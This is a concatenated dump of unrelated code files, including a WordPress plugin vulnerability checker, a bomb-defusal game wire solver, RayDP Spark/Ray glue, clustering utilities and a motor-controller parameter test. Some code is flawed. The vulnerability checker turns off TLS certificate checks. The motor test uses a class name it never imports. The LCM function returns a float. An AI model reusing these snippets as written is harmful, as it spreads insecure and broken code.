self.fullurl = '{}/plugins/{}'.format(self.wpvulndbbaseurl, self.pluginfilename)\n self.log.warning(\n 'something funky with this plugin. 
Likely only has a filename to go off of.: {}'.format(\n self.fullurl))\n\n self.pullvulndata()\n if self.r.status_code == 404:\n try:\n self.fullurl = '{}/plugins/{}'.format(self.wpvulndbbaseurl, self.pluginfilename[:-4])\n self.pullvulndata()\n for wpvdb_key, wpvdb_val in json.loads(self.r.text).items():\n self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"] = wpvdb_val\n except Exception as E:\n self.log.error(\n 'plugin=\\\"{}\\\" function=\\\"pluginlookup()\\\" wpvulndbstatuscode=\\\"{}\\\" exception=\\\"{}\\\" ' \\\n 'msg=\\\"Prob couldnt find by pluginfilename. \\\"'.format(\n self.pluginfilename,\n self.r.status_code, E))\n continue\n try:\n for wpvdb_key, wpvdb_val in json.loads(self.r.text).items():\n self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"] = wpvdb_val\n if wpvdb_val[\"vulnerabilities\"]:\n for vuln in self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"][\"vulnerabilities\"]:\n if self.versioncheck(_curver=inventory_val[\"version\"],\n _fixed_in=vuln[\"fixed_in\"],\n _name=inventory_key):\n vuln[\"vulnerablestatus\"] = True\n self.jsonout['confirmed_vulns']['plugins'].append(vuln)\n else:\n vuln[\"vulnerablestatus\"] = False\n else:\n self.log.info('No vulns found on wpvulndb for {}. skipping'.format(self.r.url))\n self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"] = wpvdb_val\n\n except Exception as E:\n self.log.error(\n 'plugin=\\\"{}\\\" function=\\\"pluginlookup()\\\" wpvulndbstatuscode=\\\"{}\\\" exception=\\\"{}\\\" ' \\\n 'msg=\\\"Prob couldnt find by plugindirname.\\\"'.format(\n self.plugindirname,\n self.r.status_code, E))\n continue\n return self.jsonout[\"plugins\"]\n\n def versioncheck(self, _curver, _fixed_in, _name='None'):\n if _fixed_in is None:\n self.log.info('{} is vulnerable. _curver: {} _fixed_in: {}'.format(_name, _curver, _fixed_in))\n return True\n if parse_version(_curver) < parse_version(_fixed_in):\n self.log.info('{} is vulnerable. _curver: {} _fixed_in: {}'.format(_name, _curver, _fixed_in))\n return True\n else:\n self.log.info('{} is NOT vulnerable. _curver: {} _fixed_in: {}'.format(_name, _curver, _fixed_in))\n return False\n\n def themelookup(self):\n \"\"\"\n To be implemented\n :return: \n \"\"\"\n return\n\n def pullvulndata(self):\n \"\"\"\n we need to make sure that the response from wpvulndb is either a 200 or 404 when looking up vulns.\n If its anything else, its likely you've been blocked by their CDN firewall. \n \"\"\"\n try:\n count = 0\n self.r = requests.get(url=self.fullurl, verify=False)\n while self.r.status_code == 429 and count < 10:\n self.r = requests.get(url=self.fullurl, verify=False)\n count += 1\n from time import sleep\n sleep(5)\n if self.r.status_code != 200 and self.r.status_code != 404:\n print(self.r.status_code)\n print(self.r.content)\n if count == 10:\n self.log.critical('something is funky with wpvulndb. tried 10 times and Failed')\n except requests.HTTPError as E:\n self.log.error('Error somewhere in pullvulndata(). {}'.format(E))\n pass\n\n def fullvulnlookup(self):\n self.corelookup()\n self.pluginlookup()\n self.themelookup()\n return self.jsonout\n","sub_path":"libs/vulnlookup.py","file_name":"vulnlookup.py","file_ext":"py","file_size_in_byte":7724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
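versioncheck() leans entirely on pkg_resources.parse_version, which compares version strings component-wise rather than lexicographically; a standalone check of the behavior the lookup relies on:

from pkg_resources import parse_version

# Component-wise comparison: '4.7.9' < '4.7.10', which a plain string compare gets wrong.
assert parse_version('4.7.9') < parse_version('4.7.10')
assert '4.7.9' > '4.7.10'  # lexicographic string comparison is misleading here

def is_vulnerable(current, fixed_in):
    # Mirrors versioncheck(): no released fix means still vulnerable.
    if fixed_in is None:
        return True
    return parse_version(current) < parse_version(fixed_in)

assert is_vulnerable('1.2.0', '1.2.1')
assert not is_vulnerable('1.2.1', '1.2.1')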
+{"seq_id":"194998749","text":"#!/usr/bin/python3\n\nclass wireModule:\n #define intialization\n def __init__(self,color,wireCount,serialNumber):\n self.color = color\n self.wireCount = wireCount\n self.serialNumber = serialNumber\n #intialize colors to zero, will iterate through function later\n self.black = 0\n self.blue = 0\n self.red = 0\n self.white = 0\n self.yellow = 0\n #positions that wires appear in, yes those are arrays\n self.blackPos = [0] * wireCount\n self.bluePos = [0] * wireCount\n self.redPos = [0] * wireCount\n self.whitePos = [0] * wireCount\n self.yellowPos = [0] * wireCount\n \n #perform solution logic on UDT\n def solve(self):\n from color import colorlist\n #puts color string into array of characters then stores the number of and position of wires\n letter = list(self.color)\n i = 0\n while i < len(letter): \n if 'x' in letter[i]:\n self.black += 1\n self.blackPos[i] = 1\n elif 'b' in letter[i]:\n self.blue += 1\n self.bluePos[i] = 1\n elif 'r' in letter[i]:\n self.red += 1\n self.redPos[i] = 1\n elif 'w' in letter[i]:\n self.white += 1\n self.whitePos[i] = 1\n elif 'y' in letter[i]:\n self.yellow += 1\n self.yellowPos[i] = 1\n i += 1\n\n #solve for three wires\n if self.wireCount == 3:\n #if there are no red wires\n if self.red == 0:\n print(colorlist.RED + \"\\n*Cut the second wire!*\" + colorlist.END)\n #if the last wire is white\n elif self.whitePos[2] == 1:\n print(colorlist.RED + \"\\n*Cut the last wire!*\" + colorlist.END)\n #if there are more than one blue wire\n elif self.blue > 1:\n print(colorlist.RED + \"\\n*Cut the last blue wire!*\" + colorlist.END)\n #otherwise...\n else:\n print(colorlist.RED + \"\\n*Cut the last wire!*\" + colorlist.END)\n\n #solve for four wires\n if self.wireCount == 4:\n #if there is more than one red wire and the last digit of the serial number is odd\n if self.red > 1 and self.serialNumber == True:\n print(colorlist.RED + \"\\n*Cut the last red wire!*\" + colorlist.END)\n #if the last wire is yellow and there are no red wires\n elif self.red == 0 and self.yellowPos[3] == 1:\n print(colorlist.RED + \"\\n*Cut the first wire!*\" + colorlist.END)\n #if there is exactly one blue wire\n elif self.blue == 1:\n print(colorlist.RED + \"\\n*Cut the first wire!*\" + colorlist.END)\n #if there is more than one yellow wire\n elif self.yellow > 1:\n print(colorlist.RED + \"\\n*Cut the last wire!*\" + colorlist.END)\n #otherwise...\n else:\n print(colorlist.RED + \"\\n*Cut the second wire!*\" + colorlist.END)\n \n #for 5 wire modules\n if self.wireCount == 5:\n #if last wire is black and the last digit of the serial number is odd\n if self.blackPos[4] == 1 and self.serialNumber == True:\n print(colorlist.RED + \"\\n*Cut the fourth wire!*\" + colorlist.END)\n #if there is exactly one red wire and there is more than one yellow wire\n elif self.red == 1 and self.yellow > 1:\n print(colorlist.RED + \"\\n*Cut the first wire!*\" + colorlist.END)\n #if there are no black wires\n elif self.black == 0:\n print(colorlist.RED + \"\\n*Cut the second wire!*\"+ colorlist.END)\n #otherwise...\n else:\n print(colorlist.RED + \"\\n*Cut the first wire!*\" + colorlist.END)\n\n #for 6 wire modules\n if self.wireCount == 6:\n #if there are no yellow wires and the last digit of the serial number is odd\n if self.yellow == 0 and self.serialNumber == True:\n print(colorlist.RED + \"\\n*Cut the third wire!*\" + colorlist.END)\n #if there is exactly one yellow wire and there is more than one white wire\n elif self.yellow == 1 and self.white > 1:\n print(colorlist.RED 
+ \"\\n*Cut the fourth wire!*\" + colorlist.END)\n #if there are no red wires\n elif self.red == 0:\n print(colorlist.RED + \"\\n*Cut the last wire!*\" + colorlist.END)\n #otherwise...\n else:\n print(colorlist.RED + \"\\n*Cut the fourth wire!*\" + colorlist.END)\n\n","sub_path":"simpleWires.py","file_name":"simpleWires.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"474655151","text":"__author__ = 'linweizhong'\n\"\"\"\nSum Root to Leaf Numbers\nGiven a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.\n\nAn example is the root-to-leaf path 1->2->3 which represents the number 123.\n\nFind the total sum of all root-to-leaf numbers.\n\nFor example,\n\n 1\n / \\\n 2 3\nThe root-to-leaf path 1->2 represents the number 12.\nThe root-to-leaf path 1->3 represents the number 13.\n\nReturn the sum = 12 + 13 = 25.\n\n\n\n\"\"\"\n\nfrom node import *\nclass Solution:\n def __init__(self):\n self.result = 0\n\n def calleaf(self,root,prefix):\n if root == None : return\n if root.right == None and root.left == None :\n self.result = self.result + prefix * 10 + root.val\n return\n if root.right != None :\n self.calleaf(root.right,prefix *10 + root.val)\n if root.left != None :\n self.calleaf(root.left,prefix*10 + root.val)\n\n # @param root, a tree node\n # @return an integer\n def sumNumbers(self, root):\n if root == None : return self.result\n self.calleaf(root,self.result)\n return self.result\n\n\n","sub_path":"leetcode/sumNumbers.py","file_name":"sumNumbers.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"109540806","text":"'''Given an integral number, determine if it's a square number:\n\nIn mathematics, a square number or perfect square is an integer that is the square of an integer; in other words, it is the product of some integer with itself.\n\nThe tests will always use some integral number, so don't worry about that in dynamic typed languages.'''\n\ndef is_square(n): \n if n < 0: #This ensures negative numbers are not seen as squares\n return False\n else:\n if (n**0.5) == ((n**0.5)//1): # This tests whether the square root of n is an integer\n return True\n else:\n return False","sub_path":"Square.py","file_name":"Square.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"623002954","text":"import pygame\nfrom pygame.sprite import Group\n\nfrom settings import Settings\nfrom ship import Ship\nimport game_functions as gf\nfrom game_stats import GameStats\nfrom button import Button\n\ndef run_game():\n #Initialize pygame, settings and screen object\n pygame.init()\n ai_sets = Settings()\n screen = pygame.display.set_mode(\n (ai_sets.screen_width, ai_sets.screen_height))\n pygame.display.set_caption(\"Alien Invasion\")\n\n # Make the Play button.\n play_button = Button(ai_sets, screen, \"Play\")\n\n # Create an instance to store game statistics.\n stats = GameStats(ai_sets)\n\n # Make our ship\n ship = Ship(ai_sets, screen)\n\n # Make an alien\n aliens = Group()\n\n # Make a group to store bullets in.\n bullets = Group()\n \n # Create the fleet of aliens.\n gf.create_fleet(ai_sets, screen, ship, aliens)\n \n #start the main loop for the game\n while True:\n # Watch for keyboard and mouse events.\n gf.check_events(ai_sets, screen, stats, play_button, ship, bullets)\n if stats.game_active:\n \n ship.update()\n\n gf.update_bullets(ai_sets, screen, ship, aliens, bullets)\n gf.update_aliens(ai_sets, stats, screen, ship, aliens, bullets)\n\n # Redraw the screen and ship during each pass through loop\n # Make the most recently drawn screen visible.\n gf.update_screen(ai_sets, screen, stats, ship, aliens, bullets, play_button)\n \n\nrun_game()\n","sub_path":"alien_invasion/alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"570490785","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport glob\nfrom collections import Iterator\nfrom typing import Any, Dict, Iterable, List, NoReturn\n\nimport pandas as pd\nimport pyarrow as pa\nimport pyspark\nimport ray\nfrom pyspark.sql.session import SparkSession\n\nimport raydp.parallel.general_dataset as parallel_dataset\nfrom raydp.parallel import PandasDataset\nfrom raydp.utils import divide_blocks\nfrom .ray_cluster_master import RayClusterMaster, RAYDP_CP\nfrom .spark_cluster import SparkCluster\n\n\nclass RayCluster(SparkCluster):\n def __init__(self):\n super().__init__(None)\n self._app_master_bridge = None\n self._set_up_master(None, None)\n self._spark_session: SparkSession = None\n\n def _set_up_master(self, resources: Dict[str, float], kwargs: Dict[Any, Any]):\n # TODO: specify the app master resource\n self._app_master_bridge = RayClusterMaster()\n self._app_master_bridge.start_up()\n\n def _set_up_worker(self, resources: Dict[str, float], kwargs: Dict[str, str]):\n raise Exception(\"Unsupported operation\")\n\n def get_cluster_url(self) -> str:\n return self._app_master_bridge.get_master_url()\n\n def get_spark_session(self,\n app_name: str,\n num_executors: int,\n executor_cores: int,\n executor_memory: int,\n extra_conf: Dict[str, str] = None) -> SparkSession:\n if self._spark_session is not None:\n return self._spark_session\n\n if extra_conf is None:\n extra_conf = {}\n extra_conf[\"spark.executor.instances\"] = str(num_executors)\n extra_conf[\"spark.executor.cores\"] = str(executor_cores)\n extra_conf[\"spark.executor.memory\"] = str(executor_memory)\n extra_conf[\"spark.jars\"] = \",\".join(glob.glob(RAYDP_CP))\n spark_builder = SparkSession.builder\n for k, v in extra_conf.items():\n spark_builder.config(k, v)\n self._spark_session =\\\n spark_builder.appName(app_name).master(self.get_cluster_url()).getOrCreate()\n return self._spark_session\n\n def save_to_ray(self, df: pyspark.sql.DataFrame, num_shards: int) -> PandasDataset:\n # call java function from python\n df = df.repartition(num_shards)\n sql_context = df.sql_ctx\n jvm = sql_context.sparkSession.sparkContext._jvm\n jdf = df._jdf\n object_store_writer = jvm.org.apache.spark.sql.raydp.ObjectStoreWriter(jdf)\n records = object_store_writer.save()\n\n worker = ray.worker.global_worker\n\n blocks: List[ray.ObjectRef] = []\n block_sizes: List[int] = []\n for record in records:\n owner_address = record.ownerAddress()\n object_id = ray.ObjectID(record.objectId())\n num_records = record.numRecords()\n # Register the ownership of the ObjectRef\n worker.core_worker.deserialize_and_register_object_ref(\n object_id.binary(), ray.ObjectRef.nil(), owner_address)\n\n blocks.append(object_id)\n block_sizes.append(num_records)\n\n divided_blocks = 
divide_blocks(block_sizes, num_shards)\n record_batch_set: List[RecordBatch] = []\n for i in range(num_shards):\n indexes = divided_blocks[i]\n object_ids = [blocks[index] for index in indexes]\n record_batch_set.append(RecordBatch(object_ids))\n\n # TODO: we should specify the resource spec for each shard\n ds = parallel_dataset.from_iterators(generators=record_batch_set,\n name=\"spark_df\")\n\n def resolve_fn(it: \"Iterable[RecordBatch]\") -> \"Iterator[RecordBatch]\":\n for item in it:\n item.resolve()\n yield item\n return ds.transform(resolve_fn, \".RecordBatch#resolve()\").flatten().to_pandas(None)\n\n def stop(self):\n if self._spark_session is not None:\n self._spark_session.stop()\n self._spark_session = None\n\n if self._app_master_bridge is not None:\n self._app_master_bridge.stop()\n self._app_master_bridge = None\n\n\nclass RecordBatch:\n def __init__(self, object_ids: List[ray.ObjectRef]):\n self._object_ids: List[ray.ObjectRef] = object_ids\n self._resolved: bool = False\n\n def _fetch_objects_without_deserialization(self, object_ids, timeout=None) -> NoReturn:\n \"\"\"\n This is just fetch object from remote object store to local and without deserialization.\n :param object_ids: Object ID of the object to get or a list of object IDs to\n get.\n :param timeout (Optional[float]): The maximum amount of time in seconds to\n wait before returning.\n \"\"\"\n is_individual_id = isinstance(object_ids, ray.ObjectID)\n if is_individual_id:\n object_ids = [object_ids]\n\n if not isinstance(object_ids, list):\n raise ValueError(\"'object_ids' must either be an object ID \"\n \"or a list of object IDs.\")\n\n worker = ray.worker.global_worker\n worker.check_connected()\n timeout_ms = int(timeout * 1000) if timeout else -1\n worker.core_worker.get_objects(object_ids, worker.current_task_id, timeout_ms)\n\n def resolve(self):\n if self._resolved:\n return\n self._fetch_objects_without_deserialization(self._object_ids)\n self._resolved = True\n\n def __iter__(self) -> \"Iterator[pd.DataFrame]\":\n for i in range(len(self._object_ids)):\n object_id = self._object_ids[i]\n assert object_id is not None\n data = ray.get(object_id)\n reader = pa.ipc.open_stream(data)\n tb = reader.read_all()\n df: pd.DataFrame = tb.to_pandas()\n yield df\n","sub_path":"python/raydp/spark/ray_cluster.py","file_name":"ray_cluster.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
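One portability hazard in this file: `from collections import Iterator` was deprecated in favor of the collections.abc types and is removed in Python 3.10, so the import alone breaks on current interpreters. A guarded variant that keeps both old and new Pythons working:

try:
    from collections.abc import Iterator  # Python 3.3+
except ImportError:  # very old interpreters only
    from collections import Iterator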
+{"seq_id":"520836042","text":"# Uses python3\n# Finds the least common multiple of two numbers.\n# For example, given 6 and 8, the LCM is 24. This is\n# done by calculating the GCD of a and b, then taking\n# a*b/GCD. \ndef lcm(a, b):\n tempa = max(a,b)\n tempb = min(a,b)\n while tempb != 0:\n new_a = tempa%tempb\n tempa = tempb\n tempb = new_a\n\n lcm = (a*b/tempa)\n return lcm\n\na, b = [int(i) for i in input().split()]\nprint(lcm(a, b))\n\n\n","sub_path":"python/lcm.py","file_name":"lcm.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"38148143","text":"from scripts.systems.AaveSystem import AaveSystem\nfrom scripts.systems.YearnSystem import YearnSystem\nfrom scripts.systems.TokenSystem import TokenSystem\n\nclass ChainRegistry:\n def __init__(self, \n curve=None,\n uniswap=None,\n open_zeppelin=None,\n aragon=None,\n sushiswap=None,\n sushi=None,\n gnosis_safe=None,\n onesplit=None,\n pickle=None,\n harvest=None,\n tokens=None,\n whales=None,\n multicall=None,\n pancake=None,\n badger=None,\n yearn=None,\n aave=None,\n compound=None,\n ):\n self.curve=curve\n self.uniswap=uniswap\n self.open_zeppelin=open_zeppelin\n self.aragon=aragon\n self.sushiswap=sushiswap\n self.sushi=sushi\n self.gnosis_safe=gnosis_safe\n self.onesplit=onesplit\n self.pickle=pickle\n self.harvest=harvest\n self.tokens=tokens\n self.whales=whales\n self.multicall=multicall\n self.pancake=pancake\n self.badger=badger\n self.yearn=yearn\n self.aave=aave\n self.compound=compound\n \n def yearn_system(self) -> YearnSystem:\n if self.yearn == None:\n raise Exception(\"No yearn system registered\")\n return YearnSystem(self)\n\n def token_system(self) -> TokenSystem:\n if self.tokens == None:\n raise Exception(\"No yearn system registered\")\n return TokenSystem(self)\n\n def aave_system(self) -> AaveSystem:\n if self.aave == None:\n raise Exception(\"No aave system registered\")\n return AaveSystem(self)","sub_path":"helpers/registry/ChainRegistry.py","file_name":"ChainRegistry.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"129355749","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Clustering utility functions.\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports\n#------------------------------------------------------------------------------\n\nimport numpy as np\n\nfrom ...utils.array import _as_array\nfrom ...utils._misc import Bunch\n\n\n#------------------------------------------------------------------------------\n# Utility functions\n#------------------------------------------------------------------------------\n\ndef _unique(x):\n \"\"\"Faster version of np.unique().\n\n This version is restricted to 1D arrays of non-negative integers.\n\n It is only faster if len(x) >> len(unique(x)).\n\n \"\"\"\n if len(x) == 0:\n return np.array([], dtype=np.int64)\n return np.nonzero(np.bincount(x))[0]\n\n\ndef _spikes_in_clusters(spike_clusters, clusters):\n \"\"\"Return the ids of all spikes belonging to the specified clusters.\"\"\"\n if len(spike_clusters) == 0 or len(clusters) == 0:\n return np.array([], dtype=np.int)\n return np.nonzero(np.in1d(spike_clusters, clusters))[0]\n\n\ndef _spikes_per_cluster(spike_ids, spike_clusters):\n \"\"\"Return a dictionary {cluster: list_of_spikes}.\"\"\"\n rel_spikes = np.argsort(spike_clusters)\n abs_spikes = spike_ids[rel_spikes]\n spike_clusters = spike_clusters[rel_spikes]\n\n diff = np.empty_like(spike_clusters)\n diff[0] = 1\n diff[1:] = np.diff(spike_clusters)\n\n idx = np.nonzero(diff > 0)[0]\n clusters = spike_clusters[idx]\n\n spikes_in_clusters = {clusters[i]: np.sort(abs_spikes[idx[i]:idx[i+1]])\n for i in range(len(clusters) - 1)}\n spikes_in_clusters[clusters[-1]] = np.sort(abs_spikes[idx[-1]:])\n\n return spikes_in_clusters\n\n\ndef _flatten_spikes_per_cluster(spikes_per_cluster):\n \"\"\"Convert a dictionary {cluster: list_of_spikes} to a\n spike_clusters array.\"\"\"\n clusters = sorted(spikes_per_cluster)\n clusters_arr = np.concatenate([(cluster *\n np.ones(len(spikes_per_cluster[cluster])))\n for cluster in clusters]).astype(np.int64)\n spikes_arr = np.concatenate([spikes_per_cluster[cluster]\n for cluster in clusters])\n spike_clusters = np.vstack((spikes_arr, clusters_arr))\n ind = np.argsort(spike_clusters[0, :])\n return spike_clusters[1, ind]\n\n\ndef _concatenate_per_cluster_arrays(spikes_per_cluster, arrays):\n \"\"\"Concatenate arrays from a {cluster: array} dictionary.\"\"\"\n # out = []\n assert set(arrays) <= set(spikes_per_cluster)\n clusters = sorted(arrays)\n # Check the sizes of the spikes per cluster and the arrays.\n n_0 = [len(spikes_per_cluster[cluster]) for cluster in clusters]\n n_1 = [len(arrays[cluster]) for cluster in clusters]\n assert n_0 == n_1\n\n # Concatenate all spikes to find the right insertion order.\n spikes = np.concatenate([spikes_per_cluster[cluster]\n for cluster in clusters])\n idx = np.argsort(spikes)\n # NOTE: concatenate all arrays along the first axis, because we assume\n # that the first axis represents the spikes.\n arrays = np.concatenate([_as_array(arrays[cluster])\n for cluster in clusters])\n return arrays[idx, ...]\n\n\n#------------------------------------------------------------------------------\n# UpdateInfo class\n#------------------------------------------------------------------------------\n\ndef update_info(**kwargs):\n \"\"\"Hold information about clustering changes.\"\"\"\n d = dict(\n description=None, # information about the update: 'merge', 'assign',\n # or 'metadata_'\n history=None, # None, 'undo', or 'redo'\n spikes=[], # all spikes 
affected by the update\n added=[], # new clusters\n deleted=[], # deleted clusters\n descendants=[], # pairs of (old_cluster, new_cluster)\n metadata_changed=[], # clusters with changed metadata\n old_spikes_per_cluster={}, # only for the affected clusters\n new_spikes_per_cluster={}, # only for the affected clusters\n )\n d.update(kwargs)\n return Bunch(d)\n\n\nUpdateInfo = update_info\n","sub_path":"phy/cluster/manual/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"123222634","text":"'''\nTest TMCL Parameters of TMCM1270 via CAN interface and module ID 1.\n\nCreated on 15.12.2020\n\n@author: LK\n'''\n\nfrom PyTrinamicMicro.platforms.motionpy.connections.can_tmcl_interface import can_tmcl_interface\nfrom PyTrinamic.modules.TMCM1270.TMCM_1270 import TMCM_1270\nimport logging\n\nMODULE_ID = 1\nGP_BANK = 0\nAP_AXIS = 0\n\nlogger = logging.getLogger(__name__)\nlogger.info(\"Test module TMCM1270 parameters via CAN\")\n\nlogger.info(\"Initializing interface.\")\ninterface = can_tmcl_interface(module_id=MODULE_ID)\n\nlogger.info(\"Initializing module.\")\nmodule = TMCM_1161(interface)\n\nlogger.info(\"Testing global parameter access.\")\n\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"CANBitrate\", module.GPs.CANBitrate))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.CANBitrate, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"CANSendId\", module.GPs.CANSendId))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.CANSendId, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"CANReceiveId\", module.GPs.CANReceiveId))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.CANReceiveId, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"CANSecondaryId\", module.GPs.CANSecondaryId))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.CANSecondaryId, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"autoStartMode\", module.GPs.autoStartMode))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.autoStartMode, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"protectionMode\", module.GPs.protectionMode))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.protectionMode, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"eepromCoordinateStore\", module.GPs.eepromCoordinateStore))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.eepromCoordinateStore, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"zeroUserVariables\", module.GPs.zeroUserVariables))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.zeroUserVariables, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"applicationStatus\", module.GPs.applicationStatus))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.applicationStatus, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"programCounter\", module.GPs.programCounter))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.programCounter, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"lastTmclError\", module.GPs.lastTmclError))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.lastTmclError, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"tickTimer\", module.GPs.tickTimer))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.tickTimer, GP_BANK)))\nlogger.info(\"Getting global parameter ({}, {}) ...\".format(\"randomNumber\", module.GPs.randomNumber))\nlogger.info(\"{}\".format(module.getGlobalParameter(module.GPs.randomNumber, GP_BANK)))\n\nlogger.info(\"Testing axis parameter access.\")\n\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"TargetPosition\", module.APs.TargetPosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.TargetPosition, 
AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ActualPosition\", module.APs.ActualPosition))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ActualPosition, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"TargetVelocity\", module.APs.TargetVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.TargetVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"ActualVelocity\", module.APs.ActualVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.ActualVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MaxVelocity\", module.APs.MaxVelocity))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MaxVelocity, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MaxAcceleration\", module.APs.MaxAcceleration))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MaxAcceleration, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MaxCurrent\", module.APs.MaxCurrent))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MaxCurrent, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"StandbyCurrent\", module.APs.StandbyCurrent))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.StandbyCurrent, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"PositionReachedFlag\", module.APs.PositionReachedFlag))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.PositionReachedFlag, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"HomeSwitch\", module.APs.HomeSwitch))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.HomeSwitch, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"RightEndstop\", module.APs.RightEndstop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.RightEndstop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"LeftEndstop\", module.APs.LeftEndstop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.LeftEndstop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"AutomaticRightStop\", module.APs.AutomaticRightStop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.AutomaticRightStop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"AutomaticLeftStop\", module.APs.AutomaticLeftStop))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.AutomaticLeftStop, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"swapSwitchInputs\", module.APs.swapSwitchInputs))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.swapSwitchInputs, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"A1\", module.APs.A1))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.A1, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"V1\", module.APs.V1))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.V1, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"MaxDeceleration\", module.APs.MaxDeceleration))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.MaxDeceleration, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"D1\", module.APs.D1))\nlogger.info(\"{}\".format(module.getAxisParameter(module.APs.D1, AP_AXIS)))\nlogger.info(\"Getting axis parameter ({}, {}) ...\".format(\"StartVelocity\", 
